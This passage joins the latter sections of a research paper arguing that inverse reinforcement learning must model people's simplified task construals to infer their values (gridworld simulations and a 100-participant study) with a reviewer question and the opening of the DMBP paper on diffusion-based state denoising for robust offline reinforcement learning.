reward. Finally, we conduct a study with human participants and find that people do model construals, and that their inferences about rewards are a much closer match to the agent that jointly models construals and rewards. Our theoretical and empirical results suggest that the current paradigm of just trying to directly infer human reward functions or preferences from demonstrations is insufficient for value-aligning real AI systems that need to interact with real people; it is crucial to also model and align on the concepts people use to reason about the task in order to understand their true values and intentions. 2 RELATED WORK Work on inferring human preferences and values is often done in the framework of inverse-reinforcement learning (IRL) (Abbeel & Ng [2004], Hadfield-Menell et al. [2016], Ho et al. [2016]) and inverse planning (Baker et al. [2009]). In the standard IRL setting, an agent is tasked with estimating or inferring the reward function that an expert is optimizing. An important benefit of IRL over other methods for learning from expert human behavior, such as behavioral cloning (Munro et al. [2011]), is that it facilitates generalization to new scenarios outside of the data given. For instance, by inferring that a human has a dispreference for eating spinach after observing behavior at home, an agent could anticipate behavior in new scenarios in which spinach appears, such as in a restaurant. Over the past two decades, methods for IRL have been extended in various ways and even used as models for social cognition in cognitive science (Ho & Griffiths [2022]). However, a key property of virtually all existing IRL methods is that they assume behavior emerges from a planning process that produces optimal or noisy-optimal policies (Abbeel & Ng [2004], Loftin et al. [2016], Ziebart et al. [2008]). This assumption is problematic because it is false (Simon [1955], Tversky & Kahneman [1974]). An alternative perspective that has been developed over the past few years is that people are resource-rational—that is, they think and act rationally, but are subject to cognitive limitations on time, memory, or attention (Lieder & Griffiths [2020]). A major research challenge for IRL, value alignment, and cognitive science is incorporating these ideas into estimating human preferences and values (Ho & Griffiths [2022]; Evans et al. [2016]; Zhi-Xuan et al. [2020]; Kwon et al. [2020]; Alanqary et al. [2021]; Chan et al. [2021]; Laidlaw & Dragan [2022]). The work here builds on recent approaches to modeling resource-rational human planning in the value-guided construal framework, which provides an account of how humans rationally simplify problems and apply simplified concepts in order to plan (Ho et al. [2022], [2023]). The key idea of value-guided construals is that people do not necessarily use all concepts available when representing a problem in order to make efficient use of limited attention (e.g., ignoring certain details of obstacles when navigating through a GridWorld). Applied to the IRL setting, this involves inverting the value-guided construal model of human decision-making and using it instead of the classical noisy-rational model. Our goal here is to provide an initial demonstration of the utility of incorporating concept simplification strategies into value alignment and IRL. 3 INTRODUCING CONSTRUALS INTO INVERSE REINFORCEMENT LEARNING We begin by reviewing the basic formalism for sequential decision-making before turning to construals and the inverse planning problem. 3.1 BACKGROUND We represent sequential decision-making tasks as Markov decision-processes (MDPs) \( M = \langle S, A, P_0, T, R, \gamma \rangle \), where \( S \) is a state space; \( A \) is an action space; \( P_0 : S \rightarrow [0, 1] \) is an initial state distribution; \( T : S \times A \times S \rightarrow [0, 1] \) is a transition function; \( R : S \times A \rightarrow \mathbb{R} \) is a real-valued reward function; and \( \gamma \in [0, 1) \) is a discount rate. A (stochastic) policy is a conditional probability distribution that maps states to distributions over actions, \( \pi : S \rightarrow \Delta(A) \). We denote the Markov chain resulting from following policy \( \pi \) on an MDP with dynamics \( T \) as \( T^\pi(s' | s) = \sum_a \pi(a | s)T(s' | s, a) \). We consider standard (unregularized) and entropy-regularized solutions to MDPs. In the unregularized setting, the value function associated with a policy \( \pi \) on an MDP with dynamics \( T \) and reward function \( R \) maps each state to the expected cumulative, discounted reward that results from following \[\pi: V_{(R,T)}^\pi(s) = \sum_a \pi(a \mid s)[R(s,a) + \gamma \sum_{s'} T(s' \mid s,a)V_{(R,T)}^\pi(s')].\] The state occupancy function (also known as the successor representation) associated with a policy \(\pi\) on an MDP with dynamics \(T\) is the expected discounted visitations to a state \(s^+\) starting from a state \(s\), \(\rho_T^\pi(s; s^+) = 1[s^+ = s] + \gamma \sum_{s'} T^\pi(s' \mid s)\rho_T^\pi(s'; s^+)\). The optimal value function for an MDP \(M\) maximizes value at each state, \(V_{(R,T)}^\pi(s) = \max_a \{R(s,a) + \gamma \sum_{s'} T(s' \mid s,a)V_{(R,T)}^\pi(s')\}\). In the entropy-regularized setting, the value of a policy \(\pi\) on MDP \(M\) is modified to include an entropy term, which penalizes action distributions that are more deterministic: \(H(\pi(\cdot \mid s)) = -\sum_a \pi(a \mid s) \ln \{\pi(a \mid s)\}\). When this penalty is parameterized by a weight \(\beta\), we denote the optimal entropy-weighted value function as \(V_{(R,T)}^{\beta\pi}(s) = \max_\pi \left\{ \sum_a \pi(a)[R(s,a) + \sum_{s'} T(s' \mid s,a)V_{(R,T)}^\pi(s')] + \beta H(\pi) \right\}\). ### 3.2 Inverse Reinforcement Learning (IRL) The standard IRL problem formulation involves an observer attempting to estimate the reward function of an expert demonstrator based on observed behavior. This can be formalized as Bayesian inference, where given a trajectory of expert acting in the task, \(\zeta = \{(s_0,a_0),(s_1,a_1),..., (s_T,a_T)\}\), the observer infers the demonstrator’s reward function, \(R\): \[ P(R \mid \zeta) = \frac{P(\zeta \mid R)P(R)}{P(\zeta)}. \] To calculate the likelihood of a trajectory \(\zeta\) given a reward function \(R\), it is typically assumed that the observer has knowledge of the dynamics of the demonstrator’s task, \(T\). Then, the likelihood is the probability of the trajectory being generated by the optimal policy under a candidate \(R\): \[ P(\zeta \mid R) = \prod_{(s_t,a_t) \in \zeta} \pi_{(R,T)}^\beta(a_t \mid s_t). \] ### 3.3 Inverse Construal The inverse construal problem considers the possibility that although a resource-limited demonstrator is acting in a task with a particular dynamics \(T\), they may not be planning their actions with respect to the fully-detailed dynamics. Rather, the demonstrator’s behavior results from planning with respect to a constructed task dynamics, \(\tilde{T}\), which reflects their understanding (or lack thereof) of notches as traversable. Thus, an observer that takes into account the resource limitations faced by human planners should instead be aiming to solve an inference problem that incorporates the possibility of alternative task construals. Formally, this is the problem: \[ P(R,\tilde{T} \mid \zeta) = \frac{P(\zeta \mid R,\tilde{T})P(R,\tilde{T})}{P(\zeta)}, \] where the prior \(P(R,\tilde{T})\) is uniform and the likelihood is given by \[ P(\zeta \mid R,\tilde{T}) = \prod_{(s_t,a_t) \in \zeta} \pi_{(R,\tilde{T})}^\beta(a_t \mid s_t). \] ### 3.4 Consequences of Not Considering Construals How bad can the estimate of \(R\) be when assuming the true dynamics \(T\) versus attempting to estimate the demonstrator’s construal \(\tilde{T}\)? If we use a maximum causal entropy formulation of IRL to get an estimated policy \(\hat{\pi}_{\text{InvRL}}\) and compare this to the estimated policy assuming the demonstrator is using a construal, \(\hat{\pi}_{\text{InvCon}}\), then the learner’s performance gap on the true task is (Wiano et al., 2021): \[ |v_{(R,T)}^{\hat{\pi}_{\text{InvCon}}} - v_{(R,T)}^{\hat{\pi}_{\text{InvRL}}}| \leq \frac{\gamma \cdot |R|^{\text{max}}}{(1-\gamma)^2} \cdot \max_{s,a} ||T(\cdot \mid s,a) - \tilde{T}(\cdot \mid s,a)||_1 \] where \(|R|^{\text{max}} = \max_{s,a} |R(s,a)|\). This is a tight bound, and thus the risk associated with not modeling construals (i.e., the potential size of the gap) grows rapidly when either the discounting, the maximum reward, or the task mismatch increases. In other words, if the observer has an inaccurate estimate of the transition function the actor uses to plan, they may drastically mis-estimate the reward function that motivated behavior. This provides a formal expression of our introductory example, in which failing to consider that a person does not know about or is unaware of a bike lane might lead one to interpret standing in the bike lane as indicating a desire to be hit by a bicycle. 4 A Simple Example of Concept Misalignment Our theoretical results show that concept misalignment creates risk of value misalignment (i.e., a large performance gap can exist). We now aim to show that the performance gap indeed exists in practice. First, we flesh out our bike lane example into a city navigation case study. Suppose Alice is trying to navigate a city to get a cup of coffee. There is a mom-and-pop bakery where she could get her favorite pastry and a delicious coffee, and a fast food franchise where she will have to wait in line and overpay but will still get a decent coffee. Given the choice, she would strongly prefer to go to the bakery. There are areas she can walk through (i.e., streets) and areas she cannot go through (i.e., locked buildings). However, there are also some unlocked buildings that she could cut through if only she knew that they are unlocked. If she perceives both the bakery and the fast food place as being accessible, she will always choose to go to the bakery (regardless of distance). However, if only the latter seems accessible, she will go get her coffee there. We visualize this setup in Figure 1. The left column corresponds to this hypothetical case where Alice prefers the bakery, and the right column corresponds to an alternate hypothetical case where Alice instead prefers the fast food place. Now consider the case where the bakery is inside of a closed courtyard and the only way to reach it is to go through an unlocked building, but the fast food place is outside of the courtyard. If Alice is unaware that there are unlocked buildings that give access to the courtyard, she may end up going to the fast food place. An observer who does not take into account that Alice does not realize there are unlocked buildings to cut through would incorrectly infer that she prefers the fast food place (see Figure 1 bottom-left). To investigate the impact of modeling (or not modeling) a construal on value alignment between a human demonstrator and a machine IRL agent in scenarios such as this city navigation example, we use blocks and notches maze tasks similar to those developed by Ho et al. (2023) to study rigidity in people’s construals (Figure 1). Each blocks-and-notches maze consists of a start state depicted as a blue circle (e.g., where Alice starts off), a high-value goal (e.g., the bakery) depicted as a pink or yellow square, a low-value goal (e.g., the fast food place) depicted as a yellow or pink square, and blue $3 \times 3$ blocks (e.g., buildings). The dark blue squares prevent movement (e.g., locked buildings), but the light blue notches (e.g., unlocked buildings) permit movement through the blocks. This environment allows us to simulate scenarios analogous to the city navigation ones described above. 4.1 Notches In our simulations, notches (represented by light blue squares within the $3 \times 3$ blue blocks) are shortcuts through the grid. The idea is that while everyone is shown the same view when tasked with navigating the grid, only some demonstrators notice and learn how to use the notches; others ignore the light blue vs dark blue distinction and treat the entire $3 \times 3$ blue block as an obstacle, which they navigate around. In other words, people with different construals of the same ground truth grid learn different paths (Ho et al., 2023). A standard IRL agent trying to infer a demonstrator’s rewards in this task is misaligned at the concept level because it assumes an optimal policy (and therefore has no notion that a human might not understand notches or how to use them). Humans, as we have discussed before, often act in ways that are not conventionally considered optimal or even rational. The IRL agent, without an understanding of the different construals people are using to understand the grid, draws incorrect conclusions about people’s values (rewards). Of the four scenarios (Figure 1) used in our experiments, the two on the bottom depict routes taken by simulated demonstrators who did not realize they could walk through notches. The near (pink) goal is unreachable without using notches; think of it as the bakery enclosed on all sides by buildings. (3 × 3 dark blue blocks) some of which are unlocked (light blue notches). The grids on the top show the trajectory of a simulated demonstrator who has learned that a notch is a shortcut, and has used the notch to form a more efficient path to their preferred goal. On the bottom are the trajectories of a simulated demonstrator who only knows the blue 3 × 3 blocks are obstacles, without paying attention to the fact that some sub-blocks (notches) are not obstacles at all. Looking at these trajectories on the lower half, the IRL agent which does not have any notion of construals and assumes an optimal policy would naturally assume the human demonstrator has a value-related reason for avoiding the pink goal, and would thus assume that the yellow goal has a higher reward. Thus we see value misalignment emerge as a consequence of concept misalignment between the human demonstrator and the IRL agent. Figure 1: Four trajectories produced by different combinations of rewards and construals. The two trajectories on the lower half with the construal "Does not understand notches" look similar, because the preferred (pink) goal is impossible to reach when not construing notches. 4.2 VALUE MISALIGNMENT In our reinforcement learning framework, we use rewards as a proxy for values. To demonstrate how concept misalignment can lead to value misalignment between humans and machines, we employ an inverse reinforcement learning agent to infer the human’s values (reward function). Without knowledge of the construals (different understanding of notches), the agent might misattribute the path to a higher reward value for the chosen goal, not realizing the other goal may in fact have a higher reward, but may be impossible to reach without using/paying attention to notches. As a measure of how alignment at the construal level can improve value alignment, we compare the posterior probability $P(R, \hat{T} | \zeta)$ when jointly modeling the reward and the construal, to $P(R | \zeta)$, the standard IRL posterior which assumes that the trajectory is coming from a policy optimal with respect to the true transition function. We run inference to calculate these probabilities for three GridWorlds shown in Figure 2 using both the reward-only model and the joint reward and construal model. The full twelve trajectories used for inference (four scenarios over each of the three GridWorlds) are shown in Figure 4. 4.3 Model results We find that the joint reward and construal model performs on par with the reward-only model in the settings where the demonstrator “understands notches”, but significantly outperforms the reward-only model in inferring values in the difficult “Does not understand notches” scenario where the preferred (pink) goal is inaccessible without using notches. In this scenario, the joint model correctly infers that the pink goal has a higher reward even though the demonstrator visits it in only one out of the three demonstrations for that scenario. The reward-only model fails completely, inferring confidently and incorrectly that the yellow goal has a higher reward due to the higher number of visits. See Figure 4 for a full comparison. 5 Human Experiments We have now shown both theoretically and in simulation that a performance gap due to concept misalignment is not only possible but also plausible. But if vanilla inverse reinforcement learning is insufficient for inferring people’s intent and preference in the real world, then how do people manage to do these things in practice? We now show that humans a) are highly adept at reasoning about construals, and b) use their knowledge of construals when making inferences about others’ paths. In this behavioral experiment, we gave 100 human participants the same four trajectories given to the two IRL agents (Figure 1) and asked them to make the same inferences. Each participant was shown a live replay of each trajectory, and then asked to infer (Figure 5) whether the person who took this route realized they could walk through notches, and if they preferred the pink goal to the yellow goal. Participants were asked to respond true or false to each question, and these responses were then mapped to scores of 1 or -1 when computing the results. These two questions map naturally to the posterior of the IRL algorithm’s construal and reward inferences about each goal. A full walkthrough of instructions, visuals, and questions shown to the human participants is included in the supplementary materials[1]. We also scale the IRL posterior inferences to this -1 to 1 scale for direct comparison with the human judgments. --- 1 Code and data: https://osf.io/hd9vc/?view_only=967b0c2f981d4a87bf4d21ff818f1322 Figure 3: One frame of the data collection process where we collected human judgements on the IRL task given the trajectories in Figure 1. In this example, the person prefers the pink goal but does not realize they can walk through notches. In the leftmost grid, they can access their preferred pink goal without using notches. But in the other two grids, they cannot access their preferred pink goal and opt for the yellow goal instead. An IRL algorithm that does not consider construals would assume that the person is intentionally choosing the yellow goal over the pink most of the time, and miscalculate the yellow goal having a higher reward, when in fact it is the other way around. Table 1: Proportion of human participants who correctly inferred rewards for each scenario. p-values are from a one-sided binominal test corresponding to the null hypothesis that the human reward inferences are explained by random chance. | Scenario | Proportion correct | p-value | |----------------------------------------------|--------------------|-----------| | Understands notches + pink goal higher reward | 0.99 | 7.967e-29 | | Doesn’t understand notches + pink goal higher reward | 0.70 | 3.925e-05 | | Understands notches + yellow goal higher reward | 0.98 | 3.984e-27 | | Doesn’t understand notches + yellow goal higher reward | 0.98 | 3.984e-27 | 5.1 Results There are three components to our results: human data, IRL inference when jointly modeling rewards and construals, and IRL inference when modeling only reward. These results are shown side-by-side in Figure 4. The posteriors of the IRL inference are scaled to match the -1 to 1 scale of the human data. Error bars for human data are one standard error from the mean over all 100 participants, for each question of each trajectory. We show that humans completing the same inference task as the IRL agents successfully use construals to make more accurate reward inferences (see Table 1), matching the behavior of the joint reward and construal model (see Figure 4). We also calculate correlations between human reward inferences and model reward inferences, which demonstrate that the joint reward and construal model is highly correlated with human reward inferences in the same scenarios (see Table 2). Table 2: Correlations between model and human inferences of reward | | Pearson correlation coefficient | p-value | |----------------------|---------------------------------|---------| | Reward-only IRL | 0.757 | 0.242 | | Jointly-modeled IRL | **0.970** | **0.029**| Figure 4: Inferences produced by humans and the two models. In the most difficult "Does not understand notches" scenario in the lower left corner, jointly modeling construals and rewards allows the IRL algorithm to successfully infer that the pink goal has higher reward, despite not being the most frequently accessed goal. Human subjects also make this inference. The reward-only IRL agent answers incorrectly and confidently that the yellow goal has higher reward. 6 DISCUSSION In this work, we formulate the problem of concept alignment within the framework of value-guided construals. When people are faced with a task, they often do not represent it in full detail and instead engage in simplification strategies to make more efficient use of limited cognitive resources (Ho et al., 2022). As a result, people may use simplified concepts that lead to different behaviors than if they had represented the task in complete detail. Our main goal here has been to formalize the inverse problem of estimating what simplified concepts people are using and show how such an approach is needed for successful value alignment in a simple setting. In the most difficult scenario of the “Does not understand notches” construal, the reward-only IRL agent confidently makes a very incorrect inference (see Figure 4) because it does not model the construal. Modeling construals and allowing for alignment at a conceptual level enables the IRL algorithm to correctly infer human rewards and values instead of confidently making an incorrect inference. Modeling construals also brings the IRL behavior closer to the human participants’ behavior, because it creates a shared conceptual framework which enables more accurate reasoning about another person’s rewards and values. 6.1 SOCIETAL IMPLICATIONS OF CONCEPT MISALIGNMENT Our results carry important implications for almost all settings where AI systems are expected to interact with people and align with their values or preferences, often in high-stakes, complex scenarios. For example, scaling up concept alignment to a healthcare diagnostic algorithm would not require agent-based IRL at all. Rather the concepts would be the medical imaging artifacts supporting diagnostic decisions, labelled by the words human physicians use to describe those artifacts. The goal would be to align those concepts to a diagnostic algorithm which analyzes the medical image and suggests a course of action, like surgery. This type of concept alignment would be a necessary prerequisite to meaningfully discuss surgery based on what the patient values most (mobility, lack of pain, effect on other organs, long-term psychological impact of the procedure). In many such contexts of AI-human interaction, concept-level alignment lays the groundwork for value alignment. 6.2 LIMITATIONS AND FUTURE WORK While our theoretical results apply to many different settings with different types of construals, our experiments focused on a case study where we could control the features that form the basis for construals. In real-world settings, there are countless more features and a simple construal model would clearly be insufficient. However, our goal was not to suggest that this specific simplified construal model is the solution to value alignment, but rather to demonstrate that concept misalignment is, in fact, a problem that AI researchers need to focus on to make progress on value alignment. In future work, we intend to scale this approach in a wider variety of settings with human experts, and involving a wider variety of inference algorithms that can scale to larger reward and construal spaces (Ho & Ermon, 2016; Herman et al., 2016; Chakraborti et al., 2019; Gopalakrishnan et al., 2021; McCallum, 1996; Cao et al., 2021). As the algorithms scale, so too should the empirical studies of human behavior to measure their alignment at the concept- and value-levels. More broadly, we hope that demonstrating the critical importance of concept alignment to the larger goal of value alignment will open the door to future work characterizing concept and value alignment in real-world settings. 6.3 CONCLUSION Human decision-making is complex, context-driven, and resource-dependent and we have to keep that in mind when we try to teach AI systems to infer human values. We have laid out a framework introducing the notion of concepts into inverse reinforcement learning and showed both theoretically and empirically that without concept alignment it may often be impossible to achieve value alignment. We also showed in a behavioral study that people reason about each other’s concepts when making inferences about each other’s goals and values. We hope that these results encourage other researchers to work on concept alignment as a crucial component in value alignment, effective human-AI interaction, and the development of safe autonomous agents. REFERENCES Pieter Abbeel and Andrew Y Ng. Apprenticeship learning via inverse reinforcement learning. In Proceedings of the twenty-first international conference on Machine learning, pp. 1, 2004. Arwa Alanqary, Gloria Z Lin, Joie Le, Tan Zhi-Xuan, Vikash K Mansinghka, and Joshua B Tenenbaum. Modeling the mistakes of boundedly rational agents within a bayesian theory of mind. arXiv preprint arXiv:2106.13249, 2021. Chris L Baker, Rebecca Saxe, and Joshua B Tenenbaum. Action understanding as inverse planning. Cognition, 113(3):329–349, 2009. Zhangjie Cao, Yilun Hao, Mengxi Li, and Dorsa Sadigh. Learning feasibility to imitate demonstrators with different dynamics. arXiv preprint arXiv:2110.15142, 2021. Tathagata Chakraborti, Anagha Kulkarni, Sarath Sreedharan, David E Smith, and Subbarao Kambhampati. Explicability? legibility? predictability? transparency? privacy? security? the emerging landscape of interpretable agent behavior. In Proceedings of the international conference on automated planning and scheduling, volume 29, pp. 86–96, 2019. Lawrence Chan, Andrew Critch, and Anca Dragan. Human irrationality: both bad and good for reward inference. arXiv preprint arXiv:2111.06956, 2021. Owain Evans, Andreas Stuhlmüller, and Noah Goodman. Learning the preferences of ignorant, inconsistent agents. In Proceedings of the AAAI Conference on Artificial Intelligence, volume 30, 2016. Sriram Gopalakrishnan, Mudit Verma, and Subbarao Kambhampati. Synthesizing policies that account for human execution errors caused by state aliasing in markov decision processes. In ICAPS 2021 Workshop on Explainable AI Planning, 2021. Dylan Hadfield-Menell, Stuart J Russell, Pieter Abbeel, and Anca Dragan. Cooperative inverse reinforcement learning. Advances in neural information processing systems, 29, 2016. Michael Herman, Tobias Gindele, Jörg Wagner, Felix Schmitt, and Wolfram Burgard. Inverse reinforcement learning with simultaneous estimation of rewards and dynamics. In Artificial intelligence and statistics, pp. 102–110. PMLR, 2016. Jonathan Ho and Stefano Ermon. Generative adversarial imitation learning. Advances in neural information processing systems, 29, 2016. Mark K. Ho and Thomas L. Griffiths, Cognitive science as a source of forward and inverse models of human decisions for robotics and control. Annual Review of Control, Robotics, and Autonomous Systems, 5(1):33–53, 2022. doi: 10.1146/annurev-control-042920-015547. URL https://doi.org/10.1146/annurev-control-042920-015547. Mark K Ho, Michael Littman, James MacGlashan, Fiery Cushman, and Joseph L Austerweil. Showing versus doing: Teaching by demonstration. Advances in neural information processing systems, 29, 2016. Mark K Ho, David Abel, Carlos G Correa, Michael L Littman, Jonathan D Cohen, and Thomas L Griffiths. People construct simplified mental representations to plan. Nature, 606(7912):129–136, 2022. Mark K Ho, Jonathan D Cohen, and Tom Griffiths. Rational simplification and rigidity in human planning, Mar 2023. URL psyarxiv.com/aqxws. Minae Kwon, Erdem Biyik, Aditi Talati, Karan Bhasin, Dylan P Losey, and Dorsa Sadigh. When humans aren’t optimal: Robots that collaborate with risk-aware humans. In Proceedings of the 2020 ACM/IEEE international conference on human-robot interaction, pp. 43–52, 2020. Cassidy Laidlaw and Anca Dragan. The boltzmann policy distribution: Accounting for systematic suboptimality in human models. arXiv preprint arXiv:2204.10759, 2022.
ZULjcYLWKe
In the experiments, results show DMBP significantly improve the robustness performance of existing offline RL methods. The review noticed that most offline RL methods used are value-based. How will DMBP perform when used with weighted imitation learning methods, e.g., IQL?
DMBP: Diffusion Model-Based Predictor for Robust Offline Reinforcement Learning Against State Observation Perturbations Zhihe Yang\textsuperscript{1,2} Yunjian Xu\textsuperscript{1,2} * \textsuperscript{1}The Chinese University of Hong Kong, Hong Kong SAR, China \textsuperscript{2}The Chinese University of Hong Kong, Shenzhen Research Institute (SZRI), Guangdong, China [email protected], [email protected] Abstract Offline reinforcement learning (RL), which aims to fully explore offline datasets for training without interaction with environments, has attracted growing recent attention. A major challenge for the real-world application of offline RL stems from the robustness against state observation perturbations, e.g., as a result of sensor errors or adversarial attacks. Unlike online robust RL, agents cannot be adversarially trained in the offline setting. In this work, we propose Diffusion Model-Based Predictor (DMBP) in a new framework that recovers the actual states with conditional diffusion models for state-based RL tasks. To mitigate the error accumulation issue in model-based estimation resulting from the classical training of conventional diffusion models, we propose a non-Markovian training objective to minimize the sum entropy of denoised states in RL trajectory. Experiments on standard benchmark problems demonstrate that DMBP can significantly enhance the robustness of existing offline RL algorithms against different scales of random noises and adversarial attacks on state observations. Further, the proposed framework can effectively deal with incomplete state observations with random combinations of multiple unobserved dimensions in the test. Our implementation is available at \url{https://github.com/zhiyang2226/DMBP}. 1 Introduction Reinforcement learning (RL) has been proven to be a powerful tool for high-dimensional decision-making problems under uncertainty (Mnih et al., 2015; Silver et al., 2017; Schrittwieser et al., 2020). However, its trial-and-error learning manner requires frequent interactions with the environment, which can be expensive and/or dangerous in a variety of real-world applications (Levine et al., 2020). A widely adopted solution is to build up a simulator for policy training, which is costly and may fail due to the discrepancy between the simulator and reality. As a promising alternative that has received growing attention, offline RL fully explores offline datasets and requires no interaction with the environments in the training process. A major challenge of offline training is on the robustness against perturbation on state observations, which may result from sensor errors, adversarial attacks, and mismatches between statistic datasets and the real environment. For example, GPS signal errors can lead to inaccurate positioning of autonomous vehicles, and position sensor errors can lead to erroneous estimation of robot arm postures. The robustness of the trained policy against state perturbations is vital for preventing agents from catastrophic movements. In online settings, various adversarial training methods have been proposed to robustly handle the mismatch between observed and actual states (Zhang et al., 2020, 2021; Sun et al., 2021). These methods are not directly applicable in offline training. A classical approach against perturbed state observation is to train robust policies against worst-case disturbances (see the left subplot in Figure 1), which may lead to over-conservatism (Zhang et al., 2020, 2021). In a pioneering work (Yang et al., 2022), the authors propose an alternative approach that adopts the conservative smoothing method to smoothen the Q-value and regularize the policy, preventing the agent from taking catastrophic movements under adversarial attacks in the test. The performance of the aforementioned approach may decay quickly with the increasing noise scale, especially in complicated environments with high-dimensional action and state spaces. *Corresponding author For online image-based deep RL, Lin et al. (2017) propose a model-based approach to “denoise” the observations by predicting the actual states. They construct a multiple-layer perceptron (MLP) neural network to detect the adversarial attack on image-based observations and predict the original states for decision-making in Atari games. For state-based RL tasks, similar MLP-based prediction methods have been used as data augmentation in online (Janner et al., 2019) and offline (Yu et al., 2020; 2021) settings instead of denoising tools. In general, MLP-based prediction methods cannot be applied to complicated state-based tasks (like Mujoco) which are sensitive to observation noise and prone to error accumulation. Recently, diffusion-based generative models (Sohl-Dickstein et al., 2015; Ho et al., 2020; Song et al., 2020b) are widely used in offline RL/decision-making problems as trajectory generators (Janner et al., 2022; Ajay et al., 2022; Liang et al., 2023) and behavior cloners (Wang et al., 2022). We note that the potential of diffusion models to facilitate decision making via state denoising has not been fully explored. Towards this end, we propose a new framework that predicts the actual states against observation perturbations for state based offline RL, which is referred to as Diffusion Model-Based Predictor (DMBP). Different from the aforementioned works, the proposed approach utilizes diffusion models as noise reduction tools rather than generation models, and can therefore enhance the robustness of existing offline RL algorithms against different scales of perturbations on state observations. A diagram of the proposed approach is shown in the right subplot of Figure 1. Given the past-estimated state trajectory, last-step agent-generated action, and the noised current state from the environment, DMBP utilizes a conditioned diffusion model to estimate the current state by reversely denoising data. To mitigate the error accumulation issue in state estimation, we propose a new non-Markovian loss function that minimizes the sum entropy of denoised states over the RL trajectory (cf. Section 4). In order to well capture the relationship between the noised current state and the denoised state trajectory (especially the last RL timestep denoised state), we propose an Unet-MLP neural network structure to predict noise information (cf. Appendix B.1). The output of DMBP is an estimation of the current state, which is fed into an offline RL algorithm to generate the action. To our knowledge, this is the first state denoising framework for offline RL against observation perturbations in state-based tasks. The proposed framework has several advantages over existing offline RL methods against noisy observations. First, with an objective of recovering the actual state, DMBP can significantly strengthen the robustness of existing offline RL algorithms against different scales of random noises and adversarial attacks. The proposed approach does not lead to over-conservative policies, compared with counterparts that train robust policies against worst-case (or adversarial) perturbations. Further, by virtue of the capability of diffusion models to infill the missing regions (i.e., image inpainting), DMBP facilitates the decision making under incomplete state observations with random combinations of multiple unobserved dimensions in the test. Such a situation is common in reality, for example, when robots continue to work with compromised sensors. 2 RELATED WORKS Robust RL. Robust RL can be categorized into two taxonomies: training-time and testing-time robustness. Training-time robust RL involves perturbations during the training process, while evaluating the agent in a clean environment (Zhang et al., 2022b; Ye et al., 2023). Conversely, testing-time robust RL focuses on training the agent with unperturbed datasets or environments and then testing its performance in the presence of disturbances (Yang et al., 2022; Panaganti et al., 2022). Our work primarily aims at enhancing the testing-time robustness of existing offline RL algorithms. Testing-time robust RL formulations can generally be divided into three categories (Xu et al., 2022). i) Uncertain observations: In online settings, Zhang et al. (2020) propose a state-adversarial Markov decision process (SA-MDP) framework, which is advanced by Zhang et al. (2021); Sun et al. (2021) that adopt neural networks to simulate worst-case observation attacks for the training of more robust policies. In offline settings, Yang et al. (2022) utilize the conservative smoothing method to make the agent take similar actions when the perturbations on state observation are relatively small. ii) Uncertain actions: Tessler et al. (2019) explore the training of robust policies against two types of action uncertainties, i.e., occasional and constant adversarial perturbations. Tan et al. (2020) utilize adversarial training on actions to enhance the robustness against action perturbations. iii) Uncertain transitions and rewards: The computation of optimal policies against uncertain environment parameters has been explored under the robust Markov Decision Process (MDP) (Xu & Mannor, 2006; Roy et al., 2017; Ho et al., 2018) and the distributionally robust MDP frameworks (Xu & Mannor, 2010; Yu & Xu, 2015). In online RL settings, Pinto et al. (2017) and Gleave et al. (2019) train the agent under adversarial model uncertainty through a two-player Markov game approach (Littman, 1994). For offline RL training, Panaganti et al. (2022) propose a dual reformulated robust Bellman operator to deal with the uncertain transition probability. For models in the first two categories, the true states and transition probabilities of the environments are not influenced by the action, which is not the case for the robust approaches against model uncertainties developed in the third category. Our work belongs to the first category. Diffusion models in offline RL. The diffusion model was originally proposed as an iterative denoising procedure for image generation in computer vision (Sohl-Dickstein et al., 2015; Ho et al., 2020). Recently, diffusion model has been adopted in decision-making for state-based tasks. Diffuser (Janner et al., 2022) and Decision Diffuser (Ajay et al., 2022) utilize the conditional diffusion model as a trajectory generator to facilitate the decision making of the agent. Wang et al. (2022) propose the Diffusion-QL algorithm that adopts the diffusion model to regulate the policy not to be far away from the one used in datasets, in a similar spirit to Fujimoto et al. (2019); Wu et al. (2019). Different from the aforementioned works, the proposed approach utilizes the diffusion model as a denoiser (against state observation perturbations) rather than a generator, for robust offline training of RL agents. 3 PRELIMINARIES Offline RL. RL tasks are generally modeled as Markovian Decision Processes (MDP) in the form of $M = (S, A, r, P, \gamma, d_0)$, where $S$ is the state space, $A$ is the action space, $r : S \times A \rightarrow \mathbb{R}$ represents the reward function, $P$ is the model dynamics, $\gamma \in [0, 1)$ is the discount factor, and $d_0 \in \Delta(S)$ is the distribution of initial state $s_0$ (the set of the probability distribution over $X$ is denoted as $\Delta(X)$). $P(s'|s, a) : S \times A \rightarrow \Delta(S)$ represents the transition function from state $s$ to $s'$ when taking action $a$. The state-action-reward transitions over trajectory are recorded as $\tau := (s_t, a_t, r_t)_{t \geq 0}$. The goal of RL is to learn a policy $\pi_\phi$ that maximizes the expectation of the cumulated discounted reward $R(\tau) = \sum_{t=0}^{\infty} \gamma^t r(s_t, a_t)$, denoted by $\pi_\phi^* = \arg\max_\pi \mathbb{E}_{s_0 \sim d_0, a \sim \pi}[R(\tau)]$. A commonly used iteration method for state-based tasks is under the actor-critic framework, where the Q-value of a policy is defined as $Q_\pi(s_t, a_t) := \mathbb{E}_{a \sim \pi}[\sum_{i=t}^{\infty} \gamma^{(i-t)} r(s_i, a_i)]$ and is modeled using neural networks (recorded as $Q_\psi(s_t, a_t)$). To approach an optimal policy, the temporal difference (TD) method is adopted to update the critic Q-value by minimizing the TD loss: $\mathcal{L}_{TD}(\psi) := \mathbb{E}_{(s,a,r,s') \in D}[(r + \gamma \max_{a' \in A} Q_\psi(s', a') - Q_\psi(s, a))^2]$. The actor is updated by $\mathcal{L}_{actor}(\phi) := \mathbb{E}_{s \in D, a \sim \pi_\phi(s)}[-Q(s, a)]$, where the dataset $D$ records historical interactions between agent and environment, and is continuously updated in the alternate training of the actor and the critic. In offline RL settings, the training is performed on a statistic dataset $D_\nu := \{(s, a, r, s')\}$, which is obtained from a behavior policy $\pi_\nu$, without any interaction with the environment. Direct adoption of the actor-critic approach may lead to a severe distributional shift between the trained policy \( \pi_\phi \) and the behavior policy \( \pi_\theta \) due to the over-estimation of the Q-value of actions unseen in datasets. To mitigate this issue, policy regularization has been adopted to update the actor through constrained policy loss (Wu et al., 2019; Kumar et al., 2019; Fujimoto et al., 2019; Fujimoto & Gu, 2021; Wang et al., 2022): \[ L(\phi) := L_d(\phi) + \alpha_{actor} L_{actor}(\phi), \] where \( L_d(\phi) \) is the behavior cloning loss representing the nominal distance between the trained policy and the behavior policy, and \( \alpha_{actor} \) is the coefficient for the Q-value term. Alternatively, conservative Q estimation 